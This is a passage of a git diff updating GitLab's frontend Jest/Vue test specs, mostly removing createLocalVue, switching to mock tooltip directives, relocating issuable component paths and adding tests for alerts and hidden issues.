beforeEach(() => { - data = { - rootStorageStatistics: { - wikiSize: 5000, - repositorySize: 4000, - packagesSize: 3000, - lfsObjectsSize: 2000, - buildArtifactsSize: 500, - pipelineArtifactsSize: 500, - snippetsSize: 2000, - storageSize: 17000, - uploadsSize: 1000, - }, - limit: 2000, - }; - mountComponent(data); - }); - - afterEach(() => { - wrapper.destroy(); - }); - - it('renders the legend in order', () => { - const types = wrapper.findAll('[data-testid="storage-type-legend"]'); - - const { - buildArtifactsSize, - pipelineArtifactsSize, - lfsObjectsSize, - packagesSize, - repositorySize, - wikiSize, - snippetsSize, - uploadsSize, - } = data.rootStorageStatistics; - - expect(types.at(0).text()).toMatchInterpolatedText(`Wikis ${numberToHumanSize(wikiSize)}`); - expect(types.at(1).text()).toMatchInterpolatedText( - `Repositories ${numberToHumanSize(repositorySize)}`, - ); - expect(types.at(2).text()).toMatchInterpolatedText( - `Packages ${numberToHumanSize(packagesSize)}`, - ); - expect(types.at(3).text()).toMatchInterpolatedText( - `LFS Objects ${numberToHumanSize(lfsObjectsSize)}`, - ); - expect(types.at(4).text()).toMatchInterpolatedText( - `Snippets ${numberToHumanSize(snippetsSize)}`, - ); - expect(types.at(5).text()).toMatchInterpolatedText( - `Artifacts ${numberToHumanSize(buildArtifactsSize + pipelineArtifactsSize)}`, - ); - expect(types.at(6).text()).toMatchInterpolatedText(`Uploads ${numberToHumanSize(uploadsSize)}`); - }); - - describe('when storage type is not used', () => { - beforeEach(() => { - data.rootStorageStatistics.wikiSize = 0; - mountComponent(data); - }); - - it('filters the storage type', () => { - expect(wrapper.text()).not.toContain('Wikis'); - }); - }); - - describe('when there is no storage usage', () => { - beforeEach(() => { - data.rootStorageStatistics.storageSize = 0; - mountComponent(data); - }); - - it('it does not render', () => { - expect(wrapper.html()).toEqual(''); - }); - }); - - describe('when limit is 0', () => { - beforeEach(() => { - data.limit = 0; - mountComponent(data); - }); - - it('sets correct flex values', () => { - expect(findStorageTypeUsagesSerialized()).toStrictEqual([ - '0.29411764705882354', - '0.23529411764705882', - '0.17647058823529413', - '0.11764705882352941', - '0.11764705882352941', - '0.058823529411764705', - '0.058823529411764705', - ]); - }); - }); - - describe('when storage exceeds limit', () => { - beforeEach(() => { - data.limit = data.rootStorageStatistics.storageSize - 1; - mountComponent(data); - }); - - it('it does render correclty', () => { - expect(findStorageTypeUsagesSerialized()).toStrictEqual([ - '0.29411764705882354', - '0.23529411764705882', - '0.17647058823529413', - '0.11764705882352941', - '0.11764705882352941', - '0.058823529411764705', - '0.058823529411764705', - ]); - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js b/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js index 380b7231acd..9e7e5c1263f 100644 --- a/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js +++ b/spec/frontend/vue_shared/components/tooltip_on_truncate_spec.js @@ -1,25 +1,20 @@ import { mount, shallowMount } from '@vue/test-utils'; +import { nextTick } from 'vue'; import { hasHorizontalOverflow } from '~/lib/utils/dom_utils'; -import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate.vue'; +import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate/tooltip_on_truncate.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -const DUMMY_TEXT = 'lorem-ipsum-dolar-sit-amit-consectur-adipiscing-elit-sed-do'; +const MOCK_TITLE = 'lorem-ipsum-dolar-sit-amit-consectur-adipiscing-elit-sed-do'; +const SHORT_TITLE = 'my-text'; -const createChildElement = () => `<a href="#">${DUMMY_TEXT}</a>`; +const createChildElement = () => `<a href="#">${MOCK_TITLE}</a>`; jest.mock('~/lib/utils/dom_utils', () => ({ - hasHorizontalOverflow: jest.fn(() => { + ...jest.requireActual('~/lib/utils/dom_utils'), + hasHorizontalOverflow: jest.fn().mockImplementation(() => { throw new Error('this needs to be mocked'); }), })); -jest.mock('@gitlab/ui', () => ({ - GlTooltipDirective: { - bind(el, binding) { - el.classList.add('gl-tooltip'); - el.setAttribute('data-original-title', el.title); - el.dataset.placement = binding.value.placement; - }, - }, -})); describe('TooltipOnTruncate component', () => { let wrapper; @@ -27,15 +22,31 @@ describe('TooltipOnTruncate component', () => { const createComponent = ({ propsData, ...options } = {}) => { wrapper = shallowMount(TooltipOnTruncate, { - attachTo: document.body, propsData: { + title: MOCK_TITLE, ...propsData, }, + slots: { + default: [MOCK_TITLE], + }, + directives: { + GlTooltip: createMockDirective(), + GlResizeObserver: createMockDirective(), + }, ...options, }); }; const createWrappedComponent = ({ propsData, ...options }) => { + const WrappedTooltipOnTruncate = { + ...TooltipOnTruncate, + directives: { + ...TooltipOnTruncate.directives, + GlTooltip: createMockDirective(), + GlResizeObserver: createMockDirective(), + }, + }; + // set a parent around the tested component parent = mount( { @@ -43,74 +54,85 @@ describe('TooltipOnTruncate component', () => { title: { default: '' }, }, template: ` - <TooltipOnTruncate :title="title" truncate-target="child"> - <div>{{title}}</div> - </TooltipOnTruncate> + <TooltipOnTruncate :title="title" truncate-target="child"> + <div>{{title}}</div> + </TooltipOnTruncate> `, components: { - TooltipOnTruncate, + TooltipOnTruncate: WrappedTooltipOnTruncate, }, }, { propsData: { ...propsData }, - attachTo: document.body, ...options, }, ); - wrapper = parent.find(TooltipOnTruncate); + wrapper = parent.find(WrappedTooltipOnTruncate); }; - const hasTooltip = () => wrapper.classes('gl-tooltip'); + const getTooltipValue = () => getBinding(wrapper.element, 'gl-tooltip')?.value; + const resize = async ({ truncate }) => { + hasHorizontalOverflow.mockReturnValueOnce(truncate); + getBinding(wrapper.element, 'gl-resize-observer').value(); + await nextTick(); + }; afterEach(() => { wrapper.destroy(); }); - describe('with default target', () => { - it('renders tooltip if truncated', () => { + describe('when truncated', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(true); - createComponent({ - propsData: { - title: DUMMY_TEXT, - }, - slots: { - default: [DUMMY_TEXT], - }, - }); + createComponent(); + }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element); - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(DUMMY_TEXT); - expect(wrapper.attributes('data-placement')).toEqual('top'); + it('renders tooltip', async () => { + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, }); + expect(wrapper.classes('js-show-tooltip')).toBe(true); }); + }); - it('does not render tooltip if normal', () => { + describe('with default target', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(false); - createComponent({ - propsData: { - title: DUMMY_TEXT, - }, - slots: { - default: [DUMMY_TEXT], - }, + createComponent(); + }); + + it('does not render tooltip if not truncated', () => { + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); + expect(wrapper.classes('js-show-tooltip')).toBe(false); + }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element); - expect(hasTooltip()).toBe(false); + it('renders tooltip on resize', async () => { + await resize({ truncate: true }); + + expect(getTooltipValue()).toMatchObject({ + disabled: false, + }); + + await resize({ truncate: false }); + + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); }); }); describe('with child target', () => { - it('renders tooltip if truncated', () => { + it('renders tooltip if truncated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - title: DUMMY_TEXT, truncateTarget: 'child', }, slots: { @@ -118,13 +140,18 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[0]); - expect(hasTooltip()).toBe(true); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[0]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, }); }); - it('does not render tooltip if normal', () => { + it('does not render tooltip if normal', async () => { hasHorizontalOverflow.mockReturnValueOnce(false); createComponent({ propsData: { @@ -135,19 +162,21 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[0]); - expect(hasTooltip()).toBe(false); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[0]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + disabled: true, }); }); }); describe('with fn target', () => { - it('renders tooltip if truncated', () => { + it('renders tooltip if truncated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - title: DUMMY_TEXT, truncateTarget: (el) => el.childNodes[1], }, slots: { @@ -155,93 +184,97 @@ describe('TooltipOnTruncate component', () => { }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasHorizontalOverflow).toHaveBeenCalledWith(wrapper.element.childNodes[1]); - expect(hasTooltip()).toBe(true); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element.childNodes[1]); + + await nextTick(); + + expect(getTooltipValue()).toMatchObject({ + disabled: false, }); }); }); describe('placement', () => { - it('sets data-placement when tooltip is rendered', () => { - const placement = 'bottom'; + it('sets placement when tooltip is rendered', () => { + const mockPlacement = 'bottom'; hasHorizontalOverflow.mockReturnValueOnce(true); createComponent({ propsData: { - placement, - }, - slots: { - default: DUMMY_TEXT, + placement: mockPlacement, }, }); - return wrapper.vm.$nextTick().then(() => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-placement')).toEqual(placement); + expect(hasHorizontalOverflow).toHaveBeenLastCalledWith(wrapper.element); + expect(getTooltipValue()).toMatchObject({ + placement: mockPlacement, }); }); }); describe('updates when title and slot content changes', () => { describe('is initialized with a long text', () => { - beforeEach(() => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(true); createWrappedComponent({ - propsData: { title: DUMMY_TEXT }, + propsData: { title: MOCK_TITLE }, }); - return parent.vm.$nextTick(); + await nextTick(); }); it('renders tooltip', () => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(DUMMY_TEXT); - expect(wrapper.attributes('data-placement')).toEqual('top'); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + placement: 'top', + disabled: false, + }); }); - it('does not render tooltip after updated to a short text', () => { + it('does not render tooltip after updated to a short text', async () => { hasHorizontalOverflow.mockReturnValueOnce(false); parent.setProps({ - title: 'new-text', + title: SHORT_TITLE, }); - return wrapper.vm - .$nextTick() - .then(() => wrapper.vm.$nextTick()) // wait 2 times to get an updated slot - .then(() => { - expect(hasTooltip()).toBe(false); - }); + await nextTick(); + await nextTick(); // wait 2 times to get an updated slot + + expect(getTooltipValue()).toMatchObject({ + title: SHORT_TITLE, + disabled: true, + }); }); }); - describe('is initialized with a short text', () => { - beforeEach(() => { + describe('is initialized with a short text that does not overflow', () => { + beforeEach(async () => { hasHorizontalOverflow.mockReturnValueOnce(false); createWrappedComponent({ - propsData: { title: DUMMY_TEXT }, + propsData: { title: MOCK_TITLE }, }); - return wrapper.vm.$nextTick(); + await nextTick(); }); it('does not render tooltip', () => { - expect(hasTooltip()).toBe(false); + expect(getTooltipValue()).toMatchObject({ + title: MOCK_TITLE, + disabled: true, + }); }); - it('renders tooltip after text is updated', () => { + it('renders tooltip after text is updated', async () => { hasHorizontalOverflow.mockReturnValueOnce(true); - const newText = 'new-text'; parent.setProps({ - title: newText, + title: SHORT_TITLE, }); - return wrapper.vm - .$nextTick() - .then(() => wrapper.vm.$nextTick()) // wait 2 times to get an updated slot - .then(() => { - expect(hasTooltip()).toBe(true); - expect(wrapper.attributes('data-original-title')).toEqual(newText); - expect(wrapper.attributes('data-placement')).toEqual('top'); - }); + await nextTick(); + await nextTick(); // wait 2 times to get an updated slot + + expect(getTooltipValue()).toMatchObject({ + title: SHORT_TITLE, + disabled: false, + }); }); }); }); diff --git a/spec/frontend/vue_shared/components/user_select_spec.js b/spec/frontend/vue_shared/components/user_select_spec.js index b777ac0a0a4..8994e16e517 100644 --- a/spec/frontend/vue_shared/components/user_select_spec.js +++ b/spec/frontend/vue_shared/components/user_select_spec.js @@ -1,7 +1,7 @@ import { GlSearchBoxByType, GlDropdown } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; import { cloneDeep } from 'lodash'; -import { nextTick } from 'vue'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -33,8 +33,7 @@ const waitForSearch = async () => { await waitForPromises(); }; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('User select dropdown', () => { let wrapper; @@ -62,7 +61,6 @@ describe('User select dropdown', () => { [getIssueParticipantsQuery, participantsQueryHandler], ]); wrapper = shallowMount(UserSelect, { - localVue, apolloProvider: fakeApollo, propsData: { headerText: 'test', diff --git a/spec/frontend/vue_shared/components/vuex_module_provider_spec.js b/spec/frontend/vue_shared/components/vuex_module_provider_spec.js index ebd396bd87c..c136c2054ac 100644 --- a/spec/frontend/vue_shared/components/vuex_module_provider_spec.js +++ b/spec/frontend/vue_shared/components/vuex_module_provider_spec.js @@ -1,4 +1,4 @@ -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; import Vue from 'vue'; import VueApollo from 'vue-apollo'; import VuexModuleProvider from '~/vue_shared/components/vuex_module_provider.vue'; @@ -38,10 +38,9 @@ describe('~/vue_shared/components/vuex_module_provider', () => { it('does not blow up when used with vue-apollo', () => { // See https://github.com/vuejs/vue-apollo/pull/1153 for details - const localVue = createLocalVue(); - localVue.use(VueApollo); + Vue.use(VueApollo); - createComponent({ localVue }); + createComponent(); expect(findProvidedVuexModule()).toBe(TEST_VUEX_MODULE); }); }); diff --git a/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js b/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js index 3fb60c254c9..7738a69a174 100644 --- a/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js +++ b/spec/frontend/vue_shared/gl_feature_flags_plugin_spec.js @@ -1,9 +1,8 @@ -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import GlFeatureFlags from '~/vue_shared/gl_feature_flags_plugin'; import glFeatureFlagsMixin from '~/vue_shared/mixins/gl_feature_flags_mixin'; -const localVue = createLocalVue(); - describe('GitLab Feature Flags Plugin', () => { beforeEach(() => { window.gon = { @@ -17,7 +16,7 @@ describe('GitLab Feature Flags Plugin', () => { }, }; - localVue.use(GlFeatureFlags); + Vue.use(GlFeatureFlags); }); it('should provide glFeatures to components', () => { @@ -25,7 +24,7 @@ describe('GitLab Feature Flags Plugin', () => { template: `<span></span>`, inject: ['glFeatures'], }; - const wrapper = shallowMount(component, { localVue }); + const wrapper = shallowMount(component); expect(wrapper.vm.glFeatures).toEqual({ aFeature: true, bFeature: false, @@ -39,7 +38,7 @@ describe('GitLab Feature Flags Plugin', () => { template: `<span></span>`, mixins: [glFeatureFlagsMixin()], }; - const wrapper = shallowMount(component, { localVue }); + const wrapper = shallowMount(component); expect(wrapper.vm.glFeatures).toEqual({ aFeature: true, bFeature: false, diff --git a/spec/frontend/issuable_create/components/issuable_create_root_spec.js b/spec/frontend/vue_shared/issuable/create/components/issuable_create_root_spec.js index 675d01ae4af..81362edaf37 100644 --- a/spec/frontend/issuable_create/components/issuable_create_root_spec.js +++ b/spec/frontend/vue_shared/issuable/create/components/issuable_create_root_spec.js @@ -1,7 +1,7 @@ import { mount } from '@vue/test-utils'; -import IssuableCreateRoot from '~/issuable_create/components/issuable_create_root.vue'; -import IssuableForm from '~/issuable_create/components/issuable_form.vue'; +import IssuableCreateRoot from '~/vue_shared/issuable/create/components/issuable_create_root.vue'; +import IssuableForm from '~/vue_shared/issuable/create/components/issuable_form.vue'; const createComponent = ({ descriptionPreviewPath = '/gitlab-org/gitlab-shell/preview_markdown', diff --git a/spec/frontend/issuable_create/components/issuable_form_spec.js b/spec/frontend/vue_shared/issuable/create/components/issuable_form_spec.js index 30b116bc35c..cbfd05e7903 100644 --- a/spec/frontend/issuable_create/components/issuable_form_spec.js +++ b/spec/frontend/vue_shared/issuable/create/components/issuable_form_spec.js @@ -1,7 +1,7 @@ import { GlFormInput } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import IssuableForm from '~/issuable_create/components/issuable_form.vue'; +import IssuableForm from '~/vue_shared/issuable/create/components/issuable_form.vue'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; import LabelsSelect from '~/vue_shared/components/sidebar/labels_select_vue/labels_select_root.vue'; diff --git a/spec/frontend/issuable_list/components/issuable_bulk_edit_sidebar_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar_spec.js index 52a238eac7c..0f33a3d1122 100644 --- a/spec/frontend/issuable_list/components/issuable_bulk_edit_sidebar_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import IssuableBulkEditSidebar from '~/issuable_list/components/issuable_bulk_edit_sidebar.vue'; +import IssuableBulkEditSidebar from '~/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar.vue'; const createComponent = ({ expanded = true } = {}) => shallowMount(IssuableBulkEditSidebar, { diff --git a/spec/frontend/issuable_list/components/issuable_item_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_item_spec.js index ac3bf7f3269..e38a80e7734 100644 --- a/spec/frontend/issuable_list/components/issuable_item_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_item_spec.js @@ -1,19 +1,25 @@ import { GlLink, GlLabel, GlIcon, GlFormCheckbox, GlSprintf } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 'helpers/fake_date'; -import IssuableItem from '~/issuable_list/components/issuable_item.vue'; -import IssuableAssignees from '~/vue_shared/components/issue/issue_assignees.vue'; +import { shallowMountExtended as shallowMount } from 'helpers/vue_test_utils_helper'; +import IssuableItem from '~/vue_shared/issuable/list/components/issuable_item.vue'; +import IssuableAssignees from '~/issuable/components/issue_assignees.vue'; import { mockIssuable, mockRegularLabel, mockScopedLabel } from '../mock_data'; -const createComponent = ({ issuableSymbol = '#', issuable = mockIssuable, slots = {} } = {}) => +const createComponent = ({ + issuableSymbol = '#', + issuable = mockIssuable, + enableLabelPermalinks = true, + showCheckbox = true, + slots = {}, +} = {}) => shallowMount(IssuableItem, { propsData: { issuableSymbol, issuable, - enableLabelPermalinks: true, + enableLabelPermalinks, showDiscussions: true, - showCheckbox: false, + showCheckbox, }, slots, stubs: { @@ -34,7 +40,6 @@ describe('IssuableItem', () => { beforeEach(() => { gon.gitlab_url = MOCK_GITLAB_URL; - wrapper = createComponent(); }); afterEach(() => { @@ -45,6 +50,8 @@ describe('IssuableItem', () => { describe('computed', () => { describe('author', () => { it('returns `issuable.author` reference', () => { + wrapper = createComponent(); + expect(wrapper.vm.author).toEqual(mockIssuable.author); }); }); @@ -59,7 +66,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when value of `issuable.author.id` is $authorId', async ({ authorId, returnValue }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, author: { @@ -86,7 +93,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when `issuable.webUrl` is $urlType', async ({ issuableWebUrl, returnValue }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl: issuableWebUrl, @@ -102,11 +109,13 @@ describe('IssuableItem', () => { describe('labels', () => { it('returns `issuable.labels.nodes` reference when it is available', () => { + wrapper = createComponent(); + expect(wrapper.vm.labels).toEqual(mockLabels); }); it('returns `issuable.labels` reference when it is available', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, labels: mockLabels, @@ -119,7 +128,7 @@ describe('IssuableItem', () => { }); it('returns empty array when none of `issuable.labels.nodes` or `issuable.labels` are available', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, labels: null, @@ -134,12 +143,16 @@ describe('IssuableItem', () => { describe('assignees', () => { it('returns `issuable.assignees` reference when it is available', () => { + wrapper = createComponent(); + expect(wrapper.vm.assignees).toBe(mockIssuable.assignees); }); }); describe('updatedAt', () => { it('returns string containing timeago string based on `issuable.updatedAt`', () => { + wrapper = createComponent(); + expect(wrapper.vm.updatedAt).toContain('updated'); expect(wrapper.vm.updatedAt).toContain('ago'); }); @@ -155,7 +168,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when issuable.userDiscussionsCount is $userDiscussionsCount', ({ userDiscussionsCount, returnValue }) => { - const wrapperWithDiscussions = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: { ...mockIssuable, @@ -163,9 +176,7 @@ describe('IssuableItem', () => { }, }); - expect(wrapperWithDiscussions.vm.showDiscussions).toBe(returnValue); - - wrapperWithDiscussions.destroy(); + expect(wrapper.findByTestId('issuable-discussions').exists()).toBe(returnValue); }, ); }); @@ -180,6 +191,8 @@ describe('IssuableItem', () => { `( 'return $returnValue when provided label param is a $labelType label', ({ label, returnValue }) => { + wrapper = createComponent(); + expect(wrapper.vm.scopedLabel(label)).toBe(returnValue); }, ); @@ -191,19 +204,23 @@ describe('IssuableItem', () => { ${{ title: 'foo' }} | ${'title'} | ${'foo'} ${{ name: 'foo' }} | ${'name'} | ${'foo'} `('returns string value of `label.$propWithTitle`', ({ label, returnValue }) => { + wrapper = createComponent(); + expect(wrapper.vm.labelTitle(label)).toBe(returnValue); }); }); describe('labelTarget', () => { it('returns target string for a provided label param when `enableLabelPermalinks` is true', () => { + wrapper = createComponent(); + expect(wrapper.vm.labelTarget(mockRegularLabel)).toBe( '?label_name[]=Documentation%20Update', ); }); it('returns string "#" for a provided label param when `enableLabelPermalinks` is false', async () => { - wrapper.setProps({ + wrapper = createComponent({ enableLabelPermalinks: false, }); @@ -223,7 +240,7 @@ describe('IssuableItem', () => { `( 'renders issuable title correctly when `gitlabWebUrl` is `$gitlabWebUrl` and webUrl is `$webUrl`', async ({ webUrl, gitlabWebUrl, expectedHref, expectedTarget }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl, @@ -243,7 +260,7 @@ describe('IssuableItem', () => { ); it('renders checkbox when `showCheckbox` prop is true', async () => { - wrapper.setProps({ + wrapper = createComponent({ showCheckbox: true, }); @@ -262,7 +279,7 @@ describe('IssuableItem', () => { }); it('renders issuable title with `target` set as "_blank" when issuable.webUrl is external', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl: 'http://jira.atlassian.net/browse/IG-1', @@ -277,7 +294,7 @@ describe('IssuableItem', () => { }); it('renders issuable confidential icon when issuable is confidential', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, confidential: true, @@ -296,7 +313,21 @@ describe('IssuableItem', () => { }); }); + it('renders spam icon when issuable is hidden', async () => { + wrapper = createComponent({ issuable: { ...mockIssuable, hidden: true } }); + + const hiddenIcon = wrapper.findComponent(GlIcon); + + expect(hiddenIcon.props('name')).toBe('spam'); + expect(hiddenIcon.attributes()).toMatchObject({ + title: 'This issue is hidden because its author has been banned', + arialabel: 'Hidden', + }); + }); + it('renders task status', () => { + wrapper = createComponent(); + const taskStatus = wrapper.find('[data-testid="task-status"]'); const expected = `${mockIssuable.taskCompletionStatus.completedCount} of ${mockIssuable.taskCompletionStatus.count} tasks completed`; @@ -304,6 +335,8 @@ describe('IssuableItem', () => { }); it('renders issuable reference', () => { + wrapper = createComponent(); + const referenceEl = wrapper.find('[data-testid="issuable-reference"]'); expect(referenceEl.exists()).toBe(true); @@ -311,7 +344,7 @@ describe('IssuableItem', () => { }); it('renders issuable reference via slot', () => { - const wrapperWithRefSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -320,15 +353,15 @@ describe('IssuableItem', () => { `, }, }); - const referenceEl = wrapperWithRefSlot.find('.js-reference'); + const referenceEl = wrapper.find('.js-reference'); expect(referenceEl.exists()).toBe(true); expect(referenceEl.text()).toBe(`${mockIssuable.iid}`); - - wrapperWithRefSlot.destroy(); }); it('renders issuable createdAt info', () => { + wrapper = createComponent(); + const createdAtEl = wrapper.find('[data-testid="issuable-created-at"]'); expect(createdAtEl.exists()).toBe(true); @@ -337,6 +370,8 @@ describe('IssuableItem', () => { }); it('renders issuable author info', () => { + wrapper = createComponent(); + const authorEl = wrapper.find('[data-testid="issuable-author"]'); expect(authorEl.exists()).toBe(true); @@ -351,7 +386,7 @@ describe('IssuableItem', () => { }); it('renders issuable author info via slot', () => { - const wrapperWithAuthorSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -360,16 +395,14 @@ describe('IssuableItem', () => { `, }, }); - const authorEl = wrapperWithAuthorSlot.find('.js-author'); + const authorEl = wrapper.find('.js-author'); expect(authorEl.exists()).toBe(true); expect(authorEl.text()).toBe(mockAuthor.name); - - wrapperWithAuthorSlot.destroy(); }); it('renders timeframe via slot', () => { - const wrapperWithTimeframeSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -378,15 +411,15 @@ describe('IssuableItem', () => { `, }, }); - const timeframeEl = wrapperWithTimeframeSlot.find('.js-timeframe'); + const timeframeEl = wrapper.find('.js-timeframe'); expect(timeframeEl.exists()).toBe(true); expect(timeframeEl.text()).toBe('Jan 1, 2020 - Mar 31, 2020'); - - wrapperWithTimeframeSlot.destroy(); }); it('renders gl-label component for each label present within `issuable` prop', () => { + wrapper = createComponent(); + const labelsEl = wrapper.findAll(GlLabel); expect(labelsEl.exists()).toBe(true); @@ -402,7 +435,7 @@ describe('IssuableItem', () => { }); it('renders issuable status via slot', () => { - const wrapperWithStatusSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -411,15 +444,15 @@ describe('IssuableItem', () => { `, }, }); - const statusEl = wrapperWithStatusSlot.find('.js-status'); + const statusEl = wrapper.find('.js-status'); expect(statusEl.exists()).toBe(true); expect(statusEl.text()).toBe(`${mockIssuable.state}`); - - wrapperWithStatusSlot.destroy(); }); it('renders discussions count', () => { + wrapper = createComponent(); + const discussionsEl = wrapper.find('[data-testid="issuable-discussions"]'); expect(discussionsEl.exists()).toBe(true); @@ -432,6 +465,8 @@ describe('IssuableItem', () => { }); it('renders issuable-assignees component', () => { + wrapper = createComponent(); + const assigneesEl = wrapper.find(IssuableAssignees); expect(assigneesEl.exists()).toBe(true); @@ -443,6 +478,8 @@ describe('IssuableItem', () => { }); it('renders issuable updatedAt info', () => { + wrapper = createComponent(); + const updatedAtEl = wrapper.find('[data-testid="issuable-updated-at"]'); expect(updatedAtEl.attributes('title')).toBe('Sep 10, 2020 11:41am UTC'); diff --git a/spec/frontend/issuable_list/components/issuable_list_root_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_list_root_spec.js index 7dddd2c3405..5979a65e3cd 100644 --- a/spec/frontend/issuable_list/components/issuable_list_root_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_list_root_spec.js @@ -1,12 +1,12 @@ -import { GlKeysetPagination, GlSkeletonLoading, GlPagination } from '@gitlab/ui'; +import { GlAlert, GlKeysetPagination, GlSkeletonLoading, GlPagination } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import VueDraggable from 'vuedraggable'; import { TEST_HOST } from 'helpers/test_constants'; -import IssuableItem from '~/issuable_list/components/issuable_item.vue'; -import IssuableListRoot from '~/issuable_list/components/issuable_list_root.vue'; -import IssuableTabs from '~/issuable_list/components/issuable_tabs.vue'; +import IssuableItem from '~/vue_shared/issuable/list/components/issuable_item.vue'; +import IssuableListRoot from '~/vue_shared/issuable/list/components/issuable_list_root.vue'; +import IssuableTabs from '~/vue_shared/issuable/list/components/issuable_tabs.vue'; import FilteredSearchBar from '~/vue_shared/components/filtered_search_bar/filtered_search_bar_root.vue'; import { mockIssuableListProps, mockIssuables } from '../mock_data'; @@ -36,6 +36,7 @@ const createComponent = ({ props = {}, data = {} } = {}) => describe('IssuableListRoot', () => { let wrapper; + const findAlert = () => wrapper.findComponent(GlAlert); const findFilteredSearchBar = () => wrapper.findComponent(FilteredSearchBar); const findGlKeysetPagination = () => wrapper.findComponent(GlKeysetPagination); const findGlPagination = () => wrapper.findComponent(GlPagination); @@ -310,6 +311,30 @@ describe('IssuableListRoot', () => { hasPreviousPage: true, }); }); + + describe('alert', () => { + const error = 'oopsie!'; + + it('shows alert when there is an error', () => { + wrapper = createComponent({ props: { error } }); + + expect(findAlert().text()).toBe(error); + }); + + it('emits "dismiss-alert" event when dismissed', () => { + wrapper = createComponent({ props: { error } }); + + findAlert().vm.$emit('dismiss'); + + expect(wrapper.emitted('dismiss-alert')).toEqual([[]]); + }); + + it('does not render when there is no error', () => { + wrapper = createComponent(); + + expect(findAlert().exists()).toBe(false); + }); + }); }); describe('events', () => { diff --git a/spec/frontend/issuable_list/components/issuable_tabs_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_tabs_spec.js index cbf5765078a..8c22b67bdbe 100644 --- a/spec/frontend/issuable_list/components/issuable_tabs_spec.js +++ 